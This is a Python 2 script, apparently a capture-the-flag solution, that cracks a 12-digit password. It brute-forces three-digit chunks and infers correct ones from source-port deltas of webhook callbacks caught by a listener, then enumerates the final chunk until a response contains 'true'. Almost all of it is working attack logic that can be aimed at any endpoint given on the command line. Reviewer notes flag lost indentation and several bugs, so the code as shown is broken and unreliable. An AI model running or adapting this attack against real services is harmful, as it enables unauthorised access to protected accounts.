import socket
import urllib2
import sys
import random
import logging
import operator
# Send DEBUG-and-above log records to runs.log in the working directory.
logging.basicConfig(level=logging.DEBUG, filename='runs.log')

# TCP port for the webhook listener bound further down, drawn from 20000..30000 inclusive.
PORT = random.randint(20000, 30000)
def out(text):
    """Print *text* to stdout, then record the same text in the debug log."""
    print text
    logging.debug(text)
# Target selection. `local` is hard-coded to 1, so the argv[1] branch is dead
# unless this line is edited; BASE is later added to the expected port delta.
local = 1
if local != 0:
    BASE = 1
    ENDPOINT = "http://127.0.0.1:3000"
    HOOK = "localhost:%d" % PORT
else:
    BASE = 0
    ENDPOINT = "%s" % sys.argv[1]
    HOOK = "0.0.0.0:%d" % PORT

# Listener that receives the webhook callbacks named in HOOK.
# NOTE(review): the empty host in bind() listens on every interface, even in
# local mode where the callback address is localhost.
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', PORT))
s.listen(1)
s.settimeout(2)  # accept() raises socket.timeout after 2 seconds

# Source port of the previous callback; the sentinel makes the first delta meaningless.
lastport = -54321

# Index 0 is a placeholder so that chunk numbers 1..4 index directly.
# Only chunks 1..3 have candidate lists (Python 2 range() returns a list).
chunk_candidates = ['a', range(1000), range(1000), range(1000)]
GOOD_CHUNKS = ['a'] + [0] * 4
total_requests = 0

out(ENDPOINT)
out(HOOK)
# Candidate elimination for the first three 3-digit chunks of the 12-digit
# password; this stage runs only when argv[2] is 0.
# The only signal used is the difference between the source ports of
# successive webhook callbacks accepted on the local listener.
# NOTE(review): the original indentation was lost in this paste, so the nesting
# described in these comments is inferred from statement order. Confirm against
# a correctly indented copy before relying on it.
if int(sys.argv[2]) == 0:
for CHUNK in range(1, 4):
out('Working on chunk %d' % CHUNK)
# Port delta counted as a hit for this chunk.
# Presumably it tracks how many outbound connections the service opens before
# the callback when every chunk up to this one is right. TODO confirm.
DELTA = 2 + CHUNK + BASE
# Maps candidate value -> hit count; the {-1: -1} seed keeps max() below from seeing an empty dict.
good_candidate = {-1: -1}
# Repeat passes over the remaining candidates until exactly one is left.
while len(chunk_candidates[CHUNK]) > 1:
# Per-pass counters: `twos` counts deltas below DELTA, `tested` counts requests.
twos = 0
tested = 0
# Hits required before a candidate is accepted; retuned below from the twos/tested ratio.
MINIMUM_SCORE = 3
# This could be weighted by the number of elements, since that roughly determines how many times we loop over chunk_candidates.
# NOTE(review): the list iterated here is the one .remove() is called on further down, so elements can be skipped within a pass; the enclosing while loop revisits them.
for n in chunk_candidates[CHUNK]:
if len(chunk_candidates[CHUNK]) == 1:
break
GOOD_CHUNKS[CHUNK] = n
# Chunks not yet resolved are still 0 in GOOD_CHUNKS, so the guess is zero-padded on the right.
password = '%03d%03d%03d%03d' % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3], GOOD_CHUNKS[4])
data = '{"password": "' + password + '", "webhooks": ["' + HOOK + '"]}'
# After 200 requests in this pass, adapt the acceptance threshold to the observed share of low deltas.
if tested > 200:
adjust = float(twos) / float(tested)
if adjust >= 0.7 and MINIMUM_SCORE != 2:
MINIMUM_SCORE = 2
out("MIN SCORE %d" % MINIMUM_SCORE)
if adjust <= 0.25 and MINIMUM_SCORE != 4:
MINIMUM_SCORE = 4
out("MIN SCORE %d" % MINIMUM_SCORE)
trythis = True
tries = 0
# Retry loop for one candidate.
while(trythis):
try:
# Passing `data` makes urllib2 send a POST; the response body is not read here.
urllib2.urlopen(ENDPOINT, data)
s2, (host, port) = s.accept()
portdelta = port - lastport
lastport = port
s2.close()
except socket.timeout:
# NOTE(review): on a timeout portdelta keeps its previous value (and is unbound if this is the very first attempt), yet it is still compared below.
pass
total_requests += 1
tested += 1
tries += 1
# Progress line every 250 requests; `lala` feeds only the commented-out line below.
if total_requests % 250 == 0:
lala = float(twos) / float(tested)
#out("%d/%d %3f" % (twos, tested, lala))
out("Requests so far : %d, remaining elt : %d" % (total_requests, len(chunk_candidates[CHUNK])))
#logging.warning('%d : delta: %d' % (n, portdelta))
if portdelta == DELTA:
# Add the candidate, or increment its score.
good_candidate[n] = good_candidate.get(n, 0) + 1
# If the best-scoring candidate has reached the threshold, keep only it.
best_n = max(good_candidate.iteritems(), key=operator.itemgetter(1))[0] # candidate with the highest score
if good_candidate[best_n] >= MINIMUM_SCORE:
chunk_candidates[CHUNK] = [best_n]
break
break
else:
#if portdelta == DELTA -1 :
# A delta below DELTA counts toward `twos`; a non-matching candidate is dropped from the list.
if portdelta <= DELTA - 1:
twos += 1
trythis = False
if n in chunk_candidates[CHUNK]:
chunk_candidates[CHUNK].remove(n)
break
# Give up on this candidate after three attempts.
if tries >= 3:
break
# The single surviving candidate becomes the accepted value for this chunk.
GOOD_CHUNKS[CHUNK] = chunk_candidates[CHUNK][0]
out("So far, we have %03d%03d%03d%03d (%d)" % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3], GOOD_CHUNKS[4], total_requests))
out('Working on chunk 4')
# Final stage: enumerate the last 3-digit chunk and read the HTTP response body
# instead of the callback port.
# NOTE(review): the original indentation was lost in this paste; the nesting
# described in these comments is inferred from statement order.
# The 9-digit prefix comes from the chunks found above when argv[2] is 0,
# otherwise from argv[2] itself.
if int(sys.argv[2]) == 0:
p1 = password = '%03d%03d%03d' % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3])
else:
p1 = password = '%09d' % int(sys.argv[2])
for n in xrange(0, 1000):
password = '%s%03d' % (p1, n)
data = '{"password": "' + password + '", "webhooks": ["' + HOOK + '"]}'
try:
f = urllib2.urlopen(ENDPOINT, data)
total_requests += 1
x = f.read()
except socket.timeout:
# NOTE(review): the format string has no argument, so this logs the literal text "%d : timeout".
out("%d : timeout")
pass
# NOTE(review): `x` is assigned only inside the try above, so after a timeout it holds the previous response, or is unbound on the first iteration.
out("%d : %s" % (n, x))
# Success is detected by the substring "true" in the response body.
if "true" in x:
# NOTE(review): this message is built from GOOD_CHUNKS rather than `password`. GOOD_CHUNKS appears to be filled only on the argv[2] == 0 path, so with a supplied prefix the first nine digits print as zeros. Confirm.
out("FLAG FOUND : %03d%03d%03d%03d" % (GOOD_CHUNKS[1], GOOD_CHUNKS[2], GOOD_CHUNKS[3], n))
break
# Not reached for the response that triggers the break above.
f.close()
out("Total requests: %d" % total_requests)